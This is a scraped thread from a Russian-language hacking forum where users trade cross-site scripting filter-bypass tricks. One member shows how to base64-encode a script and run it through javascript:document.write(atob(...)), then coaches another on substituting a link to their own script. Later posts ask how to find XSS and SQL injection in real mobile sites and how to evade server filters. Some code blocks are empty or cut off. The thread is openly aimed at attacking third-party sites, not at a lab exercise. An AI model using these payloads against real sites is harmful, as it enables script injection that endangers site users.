HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 20.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

для проверки кодируешь
source:

Код:
alert(1)

в бейс64
получится вот это -
source:

Код:
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
==

вставляешь вместо своего javascript:alert() вот это -
source:

Код:
javascript:document.
write
(
atob
(
'PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='
))

если алерт сработал , то уже кодируешь свой скрипт в бейс64 типа
source:

Код:


вставляешь между кавычками после atob!
а вообще это один из множества вариантов!
 
Ответить с цитированием

  #202  
Старый 20.01.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию

блин и документ фильтрует
source:

Код:
javasсriрt:d��um�nt.
write

короче можно так сказать и документ заменяет на непонятные символы или удаляет, а все остальное могу вставить
 
Ответить с цитированием

  #203  
Старый 20.01.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию

вот этот скрипт выполняеться

...

только как внутрь пихнуть свой скрипт
 
Ответить с цитированием

  #204  
Старый 20.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

а если такое вставить алерт появляется?

source:

Код:

 
Ответить с цитированием

  #205  
Старый 20.01.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию

нет изображ выходит когда вставляю
source:

Код:
...

алерт выходит, но куда прописать там скрипт не знаю
 
Ответить с цитированием

  #206  
Старый 20.01.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

тогда подставь свой урл в строку
source:

Код:
document
.
write
(
''
);

после того как подставишь закодируй строку в бейс64
и подставь между кавычками после atob
получится типа этого

source:

Код:
...

P.S.
евал - выполнить
атоб - декодировать из бейс64
 
Ответить с цитированием

  #207  
Старый 20.01.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию

спасибо бро
 
Ответить с цитированием

  #208  
Старый 08.04.2015, 01:00
rauf1324
Познающий
Регистрация: 17.09.2014
Сообщений: 48
С нами: 6134006

Репутация: 0
По умолчанию

Всем привет! остались два вопроса всего насчет xss, а так вполне могу использовать..

1 как в wap приложениях типа drugvokrug и т.д можно поискать xss (в общем и sql не помешает) то есть как выдать алерт
2 как обходить фильтр если все между скобками фильтр удаляет, категорически все кроме br и между кавычек бывает символ /
 
Ответить с цитированием

  #209  
Старый 15.07.2015, 01:00
zoonim116
Новичок
Регистрация: 15.07.2015
Сообщений: 3
С нами: 5700566

Репутация: 0
По умолчанию

Всем привет, подскажите пожалуйста, перепробовал все что можно уже, методом исключения выяснил, что сервер фильтрует символ ">alert(/XSS/) на выходе '>">alert(/XSS/)
 
Ответить с цитированием

  #210  
Старый 15.07.2015, 01:00
rox@hak
Постоянный
Регистрация: 04.07.2010
Сообщений: 592
С нами: 8345846

Репутация: 221


По умолчанию

напиши в лс урл и что куда вводил
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.